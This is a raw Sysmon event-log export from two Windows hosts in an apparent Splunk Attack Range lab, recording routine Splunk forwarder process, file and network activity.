21:44:09.585{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150014Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150013Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150012Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-70A9-60CA-100D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150011Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.585{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A9-60CA-100D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150010Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.400{39BD8DE3-70A9-60CA-100D-00000000D101}6876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150009Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.538{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BB5503328184C416D7DA4546F1D5C4,SHA256=784AB8010FD778922BF5D8B584C09AC13ACE99715556B38B2BBE0FB75A4EA3EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150008Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.412{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58349-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x8000000000000000150007Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:09.027{39BD8DE3-70A8-60CA-0F0D-00000000D101}4880640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104613Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:10.364{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4338B4F6C0F9E7A48119D826C225965A,SHA256=925EC61ACD2D407D83B01453ADCBCB659EB668F3D03AFFC796AB87106DEC41AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150028Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:10.985{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D91F1546ABC7180A15338C8AF7AF1C92,SHA256=EBAAC13D9E9ACFA945660CED96A9FD12EECD0EAFFFF320AD5B2047BAA9F6BFA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150027Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.931{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58350-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150026Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:10.553{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D68323C7034971FC871D9C4C1D8F958,SHA256=4E7EF3EBE4943E9BB244D5A83157A83C1403ABAF52BA62B5A648F13E3357C135,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104615Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:09.851{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55391-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104614Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:11.727{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A0EE95DB574A4905FD5C33920F4DA15,SHA256=25B61124F0E9F91257867037625725FDE72CA47E5D99412AE84644AEF9379CF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150037Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.558{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=844F01FFD8AC4F39B88546A329C9D827,SHA256=6293F6AB7CCE8B75D4492E09FCECB69B50597DCD8899CA467DEE830827D310BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150036Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.421{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70AB-60CA-110D-00000000D101}2920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150035Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150034Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150033Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150032Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150031Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-70AB-60CA-110D-00000000D101}2920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000150030Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.406{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70AB-60CA-110D-00000000D101}2920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000150029Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:11.221{39BD8DE3-70AB-60CA-110D-00000000D101}2920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104617Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:12.408{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1752A51CABBA2944768FCF7C33690CFD,SHA256=5595466A243072F8205644B0E2E1581271E600121649BADC2C9794BC5E78857E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104616Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:12.407{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F7B7F59057581F6E8DFECD6CF7605CB2,SHA256=4B23DBB1C1A0A4F50C5385D464D55B7F182F615E0B9E6B99D813E72BBFDA091D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150040Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:12.785{39BD8DE3-0F65-60CA-1200-00000000D101}960NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9493DC3161EF24D46C6F81A40B1575DE,SHA256=0C271F280EADCAC07129CE6A645327FB257076DC6FF8BD08E14EB0D923D9B0BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150039Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:12.585{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF36887A045C0D341C9EF04E3F0D068,SHA256=CF1B7D0BC2BDD26D956409442E9F3AA29C3D6E35BE5625D11514326D4E4A3F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150038Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:12.223{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C51807FF2C6C51E1D0138D775A8B1566,SHA256=8EF3C3887C7735F89BD2F69A6FB8354F82A562161AC900F3E3EE51959C83BCFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104626Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.092{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94645C13412C561B01EE5028758F98F1,SHA256=3FD2DB77CC7097F99B45C1917AF67198E8BB339B9EFBB4E8CD496A48EB93D1D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104625Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.092{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70AD-60CA-2113-00000000CF01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104624Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.090{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104623Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.090{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104622Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.090{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104621Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.090{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104620Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 